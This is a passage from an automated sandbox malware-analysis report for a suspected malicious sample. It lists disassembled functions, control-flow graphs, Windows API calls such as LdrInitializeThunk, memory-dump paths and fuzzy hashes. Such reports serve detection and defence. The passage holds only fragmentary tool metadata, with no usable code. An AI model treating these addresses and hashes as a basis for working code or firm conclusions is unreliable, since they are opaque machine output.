                                                                                                                              • Instruction Fuzzy Hash: 0121E6B59002489FDB10CF9AD584ADEBFF9EB48314F14801AE914A3350C374A944CF60
                                                                                                                              Function 073707F8 Relevance: 1.6, APIs: 1, Instructions: 56windowCOMMON
                                                                                                                              Download Yara Rule

                                                                                                                              Control-flow Graph

                                                                                                                              • Executed
                                                                                                                              • Not Executed
                                                                                                                              control_flow_graph 706 73707f8-73734b4 CreateIconFromResourceEx 708 73734b6-73734bc 706->708 709 73734bd-73734da 706->709 708->709
                                                                                                                              APIs
                                                                                                                              • CreateIconFromResourceEx.USER32(?,?,?,?,?,?,?,?,?,?,07373402,?,?,?,?,?), ref: 073734A7
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000007.00000002.2119767729.0000000007370000.00000040.00000800.00020000.00000000.sdmp, Offset: 07370000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_7_2_7370000_hwOHPmqcegxcxb.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: CreateFromIconResource
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 3668623891-0
                                                                                                                              • Opcode ID: 5c6fae4d9893f518dbaa9973faca3e3ecbc6ffde0a6a2b51caf8740e89f233d6
                                                                                                                              • Instruction ID: ee7bf1773aa5c254a55b0526b5e1654780092ab92923373d6a3d0869bec4ad23
                                                                                                                              • Opcode Fuzzy Hash: 5c6fae4d9893f518dbaa9973faca3e3ecbc6ffde0a6a2b51caf8740e89f233d6
                                                                                                                              • Instruction Fuzzy Hash: CD116AB6800359DFDB20CF9AD845BDEBFF8EB48320F14841AE518A7210C379A954DFA4
                                                                                                                              Function 011DAF98 Relevance: 1.5, APIs: 1, Instructions: 47COMMON
                                                                                                                              Download Yara Rule

                                                                                                                              Control-flow Graph

                                                                                                                              • Executed
                                                                                                                              • Not Executed
                                                                                                                              control_flow_graph 712 11daf98-11dafd8 713 11dafda-11dafdd 712->713 714 11dafe0-11db00b GetModuleHandleW 712->714 713->714 715 11db00d-11db013 714->715 716 11db014-11db028 714->716 715->716
                                                                                                                              APIs
                                                                                                                              • GetModuleHandleW.KERNELBASE(00000000), ref: 011DAFFE
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000007.00000002.1913143750.00000000011D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 011D0000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_7_2_11d0000_hwOHPmqcegxcxb.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: HandleModule
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 4139908857-0
                                                                                                                              • Opcode ID: 4a886888726c8bf61c7562e496ed35f2ae75a4dbdd797b182a25392b320e5e20
                                                                                                                              • Instruction ID: 3e716162e442354fbdb87409a1737b53aabe54d4652ec8fd4be79c8ea83f75c3
                                                                                                                              • Opcode Fuzzy Hash: 4a886888726c8bf61c7562e496ed35f2ae75a4dbdd797b182a25392b320e5e20
                                                                                                                              • Instruction Fuzzy Hash: 72110FB6C002498FDB24CF9AD444A9EFBF8EF88324F20845AD529A7210C379A545CFA5
                                                                                                                              Function 0106D4C4 Relevance: .1, Instructions: 75COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000007.00000002.1873142819.000000000106D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0106D000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_7_2_106d000_hwOHPmqcegxcxb.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: edb26ab3b304b147cb80f4ad14ce7ae05bf0004de0d7c0f82096d6c04c6088e7
                                                                                                                              • Instruction ID: 8b3fc723b97dd44e22f3e0fa80d1d00c625d0281ff1325036facfffd1da005f6
                                                                                                                              • Opcode Fuzzy Hash: edb26ab3b304b147cb80f4ad14ce7ae05bf0004de0d7c0f82096d6c04c6088e7
                                                                                                                              • Instruction Fuzzy Hash: AA2145B1604240DFCB15DF58D9C0F2ABFA9FB88318F24C5A9E9890B656C336D446CBA1
                                                                                                                              Function 0106D3D8 Relevance: .1, Instructions: 75COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000007.00000002.1873142819.000000000106D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0106D000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_7_2_106d000_hwOHPmqcegxcxb.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: 3ea2b6613170d4706f8f613dea9fa2e1ed122a4886cabc973aeb7c233c2168dc
                                                                                                                              • Instruction ID: 9dbb6e647e1701ee6c344c9347d80f71dd08d05417aa79b4cb5d2f52f0d0733f
                                                                                                                              • Opcode Fuzzy Hash: 3ea2b6613170d4706f8f613dea9fa2e1ed122a4886cabc973aeb7c233c2168dc
                                                                                                                              • Instruction Fuzzy Hash: E7214BB1604244DFDB05DF44C5C0F56BFA9FB88314F24C5ADE9890B256C736E846C7A1
                                                                                                                              Function 0107D1D4 Relevance: .1, Instructions: 72COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000007.00000002.1879392869.000000000107D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0107D000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_7_2_107d000_hwOHPmqcegxcxb.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: 1c89d5cb5642aa6067e8ef705df3509da826ab210dc78305fbf54a14efbbc600
                                                                                                                              • Instruction ID: ff63b5a19a4336c6b92dc1efafdf8a05bd298c5b7372f536620b5f87a8044e75
                                                                                                                              • Opcode Fuzzy Hash: 1c89d5cb5642aa6067e8ef705df3509da826ab210dc78305fbf54a14efbbc600
                                                                                                                              • Instruction Fuzzy Hash: ED2129B1A04200EFDB05DF98D5C0B26BBA5FF94324F24C5ADE9894B252C336D447CB65
                                                                                                                              Function 0107D01C Relevance: .1, Instructions: 72COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000007.00000002.1879392869.000000000107D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0107D000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_7_2_107d000_hwOHPmqcegxcxb.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: b43bfb510e4f2745f489fc73fcf51cfc959c4581cba3edb994903cc11ed208a2
                                                                                                                              • Instruction ID: 92fba61d2b14f3e032e07ffa235250e32c8ecb54a3673b538c7624d1be29a729
                                                                                                                              • Opcode Fuzzy Hash: b43bfb510e4f2745f489fc73fcf51cfc959c4581cba3edb994903cc11ed208a2
                                                                                                                              • Instruction Fuzzy Hash: 792125B5A04200DFCB16DF58D9C0B26BBA5FF84354F24C9ADE98A4B246C336D407CBA5
                                                                                                                              Function 0107D006 Relevance: .1, Instructions: 62COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000007.00000002.1879392869.000000000107D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0107D000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_7_2_107d000_hwOHPmqcegxcxb.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: 2e29a7374dd05c3090169890d38a09763e62a4df668ae7e7a4eeb621f25970ea
                                                                                                                              • Instruction ID: 742f939f5aacdbee79f4e7270ba5a49a2bc4db4694cd1ed4b7aa08ca4c6a8be8
                                                                                                                              • Opcode Fuzzy Hash: 2e29a7374dd05c3090169890d38a09763e62a4df668ae7e7a4eeb621f25970ea
                                                                                                                              • Instruction Fuzzy Hash: CC2183755093808FD713CF64D590715BFB1EF46214F28C5DAD8898B667C33A980ACBA2
                                                                                                                              Function 0106D3D3 Relevance: .1, Instructions: 56COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000007.00000002.1873142819.000000000106D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0106D000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_7_2_106d000_hwOHPmqcegxcxb.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: d470e05bf275f9961b8f2d54e60ae5f944f02dbb38b852c854ecf385a2209709
                                                                                                                              • Instruction ID: fd93a10604f4f9e89300262a0539156da0b5c74598869213d32e7e1791b62923
                                                                                                                              • Opcode Fuzzy Hash: d470e05bf275f9961b8f2d54e60ae5f944f02dbb38b852c854ecf385a2209709
                                                                                                                              • Instruction Fuzzy Hash: 68110372504240CFDB12CF44D5C0B56BFB2FB84324F24C2A9D9894B657C33AE85ACBA1
                                                                                                                              Function 0106D4BF Relevance: .1, Instructions: 56COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000007.00000002.1873142819.000000000106D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0106D000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_7_2_106d000_hwOHPmqcegxcxb.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: d470e05bf275f9961b8f2d54e60ae5f944f02dbb38b852c854ecf385a2209709
                                                                                                                              • Instruction ID: 82ff0b08e4c4ebf00cf85770291ffcf58f216a1440357bb754be64756b439c39
                                                                                                                              • Opcode Fuzzy Hash: d470e05bf275f9961b8f2d54e60ae5f944f02dbb38b852c854ecf385a2209709
                                                                                                                              • Instruction Fuzzy Hash: 94110372504280CFCB12CF54D5C0B16BFB2FB84318F24C6AAD8890B657C33AD45ACBA1
                                                                                                                              Function 0107D1CF Relevance: .1, Instructions: 53COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000007.00000002.1879392869.000000000107D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0107D000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_7_2_107d000_hwOHPmqcegxcxb.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: 244c614e04a80719a4cbb1e35d09afbc7f52f2045db6f081cea45e42cbbeead8
                                                                                                                              • Instruction ID: 99c8d633d645dfb543d26857fb5d97a9e35301936361e249cff352b47b403982
                                                                                                                              • Opcode Fuzzy Hash: 244c614e04a80719a4cbb1e35d09afbc7f52f2045db6f081cea45e42cbbeead8
                                                                                                                              • Instruction Fuzzy Hash: F611BB75904280DFDB12CF54C5C0B15BFA2FF84224F28C6AAD8894B696C33AD44BCB61

                                                                                                                              Execution Graph

                                                                                                                              Execution Coverage:0%
                                                                                                                              Dynamic/Decrypted Code Coverage:100%
                                                                                                                              Signature Coverage:0%
                                                                                                                              Total number of Nodes:5
                                                                                                                              Total number of Limit Nodes:1
                                                                                                                              execution_graph 62090 1852df0 LdrInitializeThunk 62092 1852c00 62094 1852c0a 62092->62094 62095 1852c11 62094->62095 62096 1852c1f LdrInitializeThunk 62094->62096

                                                                                                                              Executed Functions

                                                                                                                              Function 01852C0A Relevance: 1.5, APIs: 1, Instructions: 8libraryCOMMONLIBRARYCODE
                                                                                                                              Download Yara Rule

                                                                                                                              Control-flow Graph

                                                                                                                              • Executed
                                                                                                                              • Not Executed
                                                                                                                              control_flow_graph 0 1852c0a-1852c0f 1 1852c11-1852c18 0->1 2 1852c1f-1852c26 LdrInitializeThunk 0->2
                                                                                                                              APIs
                                                                                                                              • LdrInitializeThunk.NTDLL(0186FD4F,000000FF,00000024,01906634,00000004,00000000,?,-00000018,7D810F61,?,?,01828B12,?,?,?,?), ref: 01852C24
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 0000000C.00000002.2264932023.0000000001806000.00000040.00001000.00020000.00000000.sdmp, Offset: 017E0000, based on PE: true
                                                                                                                              • Associated: 0000000C.00000002.2264932023.00000000017E0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                              • Associated: 0000000C.00000002.2264932023.00000000017E7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                              • Associated: 0000000C.00000002.2264932023.0000000001860000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                              • Associated: 0000000C.00000002.2264932023.0000000001866000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                              • Associated: 0000000C.00000002.2264932023.00000000018A2000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                              • Associated: 0000000C.00000002.2264932023.0000000001903000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                              • Associated: 0000000C.00000002.2264932023.0000000001909000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_12_2_17e0000_hwOHPmqcegxcxb.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: InitializeThunk
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 2994545307-0
                                                                                                                              • Opcode ID: 2f8c2a7e7f2119047157fcddb2f4a6f5e494cf9f43b7f755912b50b067d213df
                                                                                                                              • Instruction ID: a92b9a01d327d72826e0690663e3123e9a344e096f897352b3e37720105f1ba9
                                                                                                                              • Opcode Fuzzy Hash: 2f8c2a7e7f2119047157fcddb2f4a6f5e494cf9f43b7f755912b50b067d213df
                                                                                                                              • Instruction Fuzzy Hash: F0B09B719015C5C9DB51E764460871B7905B7D1741F15C061D7074641F4738C6D5E276
                                                                                                                              Function 01852DF0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                                                                                                              Download Yara Rule

                                                                                                                              Control-flow Graph

                                                                                                                              • Executed
                                                                                                                              • Not Executed
                                                                                                                              control_flow_graph 4 1852df0-1852dfc LdrInitializeThunk
                                                                                                                              APIs
                                                                                                                              • LdrInitializeThunk.NTDLL(0188E73E,0000005A,018ED040,00000020,00000000,018ED040,00000080,01874A81,00000000,-00000001,-00000001,00000002,00000000,?,-00000001,0185AE00), ref: 01852DFA
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 0000000C.00000002.2264932023.0000000001806000.00000040.00001000.00020000.00000000.sdmp, Offset: 017E0000, based on PE: true
                                                                                                                              • Associated: 0000000C.00000002.2264932023.00000000017E0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                              • Associated: 0000000C.00000002.2264932023.00000000017E7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                              • Associated: 0000000C.00000002.2264932023.0000000001860000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                              • Associated: 0000000C.00000002.2264932023.0000000001866000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                              • Associated: 0000000C.00000002.2264932023.00000000018A2000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                              • Associated: 0000000C.00000002.2264932023.0000000001903000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                              • Associated: 0000000C.00000002.2264932023.0000000001909000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_12_2_17e0000_hwOHPmqcegxcxb.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: InitializeThunk
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 2994545307-0
                                                                                                                              • Opcode ID: 43e04ffd4988209ce620d281ba18fb1dc1063e4cd66816fe6cf7cbb8dd072bd9
                                                                                                                              • Instruction ID: 75168c6075a1908cdb55ccc3240ae4b9c9454cc47f38d0db8a52f0379153c4ea
                                                                                                                              • Opcode Fuzzy Hash: 43e04ffd4988209ce620d281ba18fb1dc1063e4cd66816fe6cf7cbb8dd072bd9
                                                                                                                              • Instruction Fuzzy Hash: 9990027120150417D1117158450470B000D97D1342F95C412A5468558DD6568B56A222
                                                                                                                              Function 018535C0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                                                              Download Yara Rule

                                                                                                                              Control-flow Graph

                                                                                                                              • Executed
                                                                                                                              • Not Executed
                                                                                                                              control_flow_graph 5 18535c0-18535cc LdrInitializeThunk
                                                                                                                              APIs
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 0000000C.00000002.2264932023.0000000001806000.00000040.00001000.00020000.00000000.sdmp, Offset: 017E0000, based on PE: true
                                                                                                                              • Associated: 0000000C.00000002.2264932023.00000000017E0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                              • Associated: 0000000C.00000002.2264932023.00000000017E7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                              • Associated: 0000000C.00000002.2264932023.0000000001860000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                              • Associated: 0000000C.00000002.2264932023.0000000001866000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                              • Associated: 0000000C.00000002.2264932023.00000000018A2000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                              • Associated: 0000000C.00000002.2264932023.0000000001903000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                              • Associated: 0000000C.00000002.2264932023.0000000001909000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_12_2_17e0000_hwOHPmqcegxcxb.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: InitializeThunk
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 2994545307-0
                                                                                                                              • Opcode ID: 3eff9917d9b19e73ee117543d228f78e073cddf200a51d20f37aec8a540976c2
                                                                                                                              • Instruction ID: 1d2091ef08af217f5abb9d48df9116cc458a6a862778378831fa01db73091989
                                                                                                                              • Opcode Fuzzy Hash: 3eff9917d9b19e73ee117543d228f78e073cddf200a51d20f37aec8a540976c2
                                                                                                                              • Instruction Fuzzy Hash: AC90027160560406D1007158451470A100997D1302F65C411A5468568DC7958B5566A3
                                                                                                                              Function 0042DE63 Relevance: .0, Instructions: 44COMMON
                                                                                                                              Download Yara Rule

                                                                                                                              Control-flow Graph

                                                                                                                              • Executed
                                                                                                                              • Not Executed
                                                                                                                              control_flow_graph 6 42de63-42dea4 9 42dea6-42dec3 6->9 10 42defe-42df03 6->10 12 42ded6-42defb 9->12 13 42dec5-42decd 9->13 12->10 15 42ded3 13->15 15->12
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 0000000C.00000002.2264273220.000000000042D000.00000040.00000400.00020000.00000000.sdmp, Offset: 0042D000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_12_2_42d000_hwOHPmqcegxcxb.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: 2a229219b317a9ccbb40cf6100e20a696e3432615629490669c4ea2199887e14
                                                                                                                              • Instruction ID: 43abe2dfc9eaaaebec6a380288e639c94385588247eb1fc800702e6ad04780ab
                                                                                                                              • Opcode Fuzzy Hash: 2a229219b317a9ccbb40cf6100e20a696e3432615629490669c4ea2199887e14
                                                                                                                              • Instruction Fuzzy Hash: 6C017571D1022C66EB20FB959C82F9DB7789B04304F8086DAA50CB7181FBB86748CF65

                                                                                                                              Non-executed Functions

                                                                                                                              Function 01852890 Relevance: 9.2, APIs: 6, Instructions: 190COMMON
                                                                                                                              Download Yara Rule

                                                                                                                              Control-flow Graph

                                                                                                                              • Executed
                                                                                                                              • Not Executed
                                                                                                                              control_flow_graph 213 1852890-18528b3 214 188a4bc-188a4c0 213->214 215 18528b9-18528cc 213->215 214->215 218 188a4c6-188a4ca 214->218 216 18528dd-18528df 215->216 217 18528ce-18528d7 215->217 220 18528e1-18528e5 216->220 217->216 219 188a57e-188a585 217->219 218->215 221 188a4d0-188a4d4 218->221 219->216 222 1852988-185298e 220->222 223 18528eb-18528fa 220->223 221->215 224 188a4da-188a4de 221->224 228 1852908-185290c 222->228 226 188a58a-188a58d 223->226 227 1852900-1852905 223->227 224->215 225 188a4e4-188a4eb 224->225 229 188a4ed-188a4f4 225->229 230 188a564-188a56c 225->230 226->228 227->228 228->220 231 185290e-185291b 228->231 232 188a50b 229->232 233 188a4f6-188a4fe 229->233 230->215 236 188a572-188a576 230->236 234 1852921 231->234 235 188a592-188a599 231->235 238 188a510-188a536 call 1860050 232->238 233->215 237 188a504-188a509 233->237 239 1852924-1852926 234->239 241 188a5a1-188a5c9 call 1860050 235->241 236->215 240 188a57c call 1860050 236->240 237->238 254 188a55d-188a55f 238->254 243 1852993-1852995 239->243 244 1852928-185292a 239->244 240->254 243->244 248 1852997-18529b1 call 1860050 243->248 250 1852946-1852966 call 1860050 244->250 251 185292c-185292e 244->251 262 1852969-1852974 248->262 250->262 251->250 257 1852930-1852944 call 1860050 251->257 260 1852981-1852985 254->260 257->250 262->239 264 1852976-1852979 262->264 264->241 265 185297f 264->265 265->260
                                                                                                                              APIs
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 0000000C.00000002.2264932023.0000000001806000.00000040.00001000.00020000.00000000.sdmp, Offset: 017E0000, based on PE: true
                                                                                                                              • Associated: 0000000C.00000002.2264932023.00000000017E0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                              • Associated: 0000000C.00000002.2264932023.00000000017E7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                              • Associated: 0000000C.00000002.2264932023.0000000001860000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                              • Associated: 0000000C.00000002.2264932023.0000000001866000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                              • Associated: 0000000C.00000002.2264932023.00000000018A2000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                              • Associated: 0000000C.00000002.2264932023.0000000001903000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                              • Associated: 0000000C.00000002.2264932023.0000000001909000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_12_2_17e0000_hwOHPmqcegxcxb.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: ___swprintf_l
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 48624451-0
                                                                                                                              • Opcode ID: 7f44c372ece56943126d72de8bce590f903e33c1f196509cc4fcfab4ca7bfa66
                                                                                                                              • Instruction ID: 66832aca91ea15be7ea65d45e2ecd669a534775dc43b453f8ea013ac8c618048
                                                                                                                              • Opcode Fuzzy Hash: 7f44c372ece56943126d72de8bce590f903e33c1f196509cc4fcfab4ca7bfa66
                                                                                                                              • Instruction Fuzzy Hash: E251F5B6A0411AAFCB55EB9C889097EFBB9FB08344714822AF8A5D7641D734DF4087A1
                                                                                                                              Function 0182A250 Relevance: 9.2, APIs: 1, Strings: 4, Instructions: 404COMMON
                                                                                                                              Download Yara Rule

                                                                                                                              Control-flow Graph

                                                                                                                              • Executed
                                                                                                                              • Not Executed
                                                                                                                              control_flow_graph 266 182a250-182a26f 267 182a275-182a291 266->267 268 182a58d-182a594 266->268 270 18779e6-18779eb 267->270 271 182a297-182a2a0 267->271 268->267 269 182a59a-18779bb 268->269 269->267 276 18779c1-18779c6 269->276 271->270 272 182a2a6-182a2ac 271->272 274 182a2b2-182a2b4 272->274 275 182a6ba-182a6bc 272->275 274->270 278 182a2ba-182a2bd 274->278 277 182a6c2 275->277 275->278 279 182a473-182a479 276->279 280 182a2c3-182a2c6 277->280 278->270 278->280 281 182a2da-182a2dd 280->281 282 182a2c8-182a2d1 280->282 285 182a2e3-182a32b 281->285 286 182a6c7-182a6d0 281->286 283 182a2d7 282->283 284 18779cb-18779d5 282->284 283->281 288 18779da-18779e3 call 189f290 284->288 289 182a330-182a335 285->289 286->285 287 182a6d6-18779ff 286->287 287->288 288->270 292 182a33b-182a343 289->292 293 182a47c-182a47f 289->293 295 182a34f-182a35d 292->295 297 182a345-182a349 292->297 294 182a485-182a488 293->294 293->295 298 1877a16-1877a19 294->298 299 182a48e-182a49e 294->299 295->299 301 182a363-182a368 295->301 297->295 300 182a59f-182a5a8 297->300 302 1877a1f-1877a24 298->302 303 182a36c-182a36e 298->303 299->298 304 182a4a4-182a4ad 299->304 305 182a5c0-182a5c3 300->305 306 182a5aa-182a5ac 300->306 301->303 307 1877a2b 302->307 311 1877a26 303->311 312 182a374-182a38c call 182a6e0 303->312 304->303 309 1877a01 305->309 310 182a5c9-182a5cc 305->310 306->295 308 182a5b2-182a5bb 306->308 313 1877a2d-1877a2f 307->313 308->303 315 1877a0c 309->315 314 182a5d2-182a5d5 310->314 310->315 311->307 319 182a4b2-182a4b9 312->319 320 182a392-182a3ba 312->320 313->279 318 1877a35 313->318 314->306 315->298 321 182a3bc-182a3be 319->321 322 182a4bf-182a4c2 319->322 320->321 321->313 323 182a3c4-182a3cb 321->323 322->321 324 182a4c8-182a4d3 322->324 325 182a3d1-182a3d4 323->325 326 1877ae0 323->326 324->289 327 182a3e0-182a3ea 325->327 328 1877ae4-1877afc call 189f290 326->328 327->328 330 182a3f0-182a40c call 182a840 327->330 328->279 334 182a412-182a417 330->334 335 182a5d7-182a5e0 330->335 334->279 336 182a419-182a43d 334->336 337 182a5e2-182a5eb 335->337 338 182a601-182a603 335->338 340 182a440-182a443 336->340 337->338 339 182a5ed-182a5f1 337->339 341 182a605-182a623 call 1814508 338->341 342 182a629-182a631 338->342 343 182a681-182a6ab RtlDebugPrintTimes 339->343 344 182a5f7-182a5fb 339->344 345 182a4d8-182a4dc 340->345 346 182a449-182a44c 340->346 341->279 341->342 343->338 365 182a6b1-182a6b5 343->365 344->338 344->343 351 182a4e2-182a4e5 345->351 352 1877a3a-1877a42 345->352 348 182a452-182a454 346->348 349 1877ad6 346->349 353 182a520-182a539 call 182a6e0 348->353 354 182a45a-182a461 348->354 349->326 355 182a634-182a64a 351->355 357 182a4eb-182a4ee 351->357 352->355 356 1877a48-1877a4c 352->356 373 182a65e-182a665 353->373 374 182a53f-182a567 353->374 359 182a467-182a46c 354->359 360 182a57b-182a582 354->360 361 182a650-182a659 355->361 362 182a4f4-182a50c 355->362 356->355 363 1877a52-1877a5b 356->363 357->346 357->362 359->279 367 182a46e 359->367 360->327 366 182a588 360->366 361->348 362->346 370 182a512-182a51b 362->370 368 1877a85-1877a87 363->368 369 1877a5d-1877a60 363->369 365->338 366->326 367->279 368->355 372 1877a8d-1877a96 368->372 375 1877a62-1877a6c 369->375 376 1877a6e-1877a71 369->376 370->348 372->348 377 182a569-182a56b 373->377 378 182a66b-182a66e 373->378 374->377 379 1877a81 375->379 380 1877a73-1877a7c 376->380 381 1877a7e 376->381 377->359 382 182a571-182a573 377->382 378->377 383 182a674-182a67c 378->383 379->368 380->372 381->379 384 182a579 382->384 385 1877a9b-1877aa4 382->385 383->340 384->360 385->384 386 1877aaa-1877ab0 385->386 386->384 387 1877ab6-1877abe 386->387 387->384 388 1877ac4-1877acf 387->388 388->387 389 1877ad1 388->389 389->384
                                                                                                                              Strings
                                                                                                                              • RtlpFindActivationContextSection_CheckParameters, xrefs: 018779D0, 018779F5
                                                                                                                              • SXS: %s() flags contains return_assembly_metadata but they don't fit in size, return invalid_parameter 0x%08lx., xrefs: 018779FA
                                                                                                                              • SXS: %s() flags contains return_flags but they don't fit in size, return invalid_parameter 0x%08lx., xrefs: 018779D5
                                                                                                                              • SsHd, xrefs: 0182A3E4
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 0000000C.00000002.2264932023.0000000001806000.00000040.00001000.00020000.00000000.sdmp, Offset: 017E0000, based on PE: true
                                                                                                                              • Associated: 0000000C.00000002.2264932023.00000000017E0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                              • Associated: 0000000C.00000002.2264932023.00000000017E7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                              • Associated: 0000000C.00000002.2264932023.0000000001860000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                              • Associated: 0000000C.00000002.2264932023.0000000001866000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                              • Associated: 0000000C.00000002.2264932023.00000000018A2000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                              • Associated: 0000000C.00000002.2264932023.0000000001903000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                              • Associated: 0000000C.00000002.2264932023.0000000001909000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_12_2_17e0000_hwOHPmqcegxcxb.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
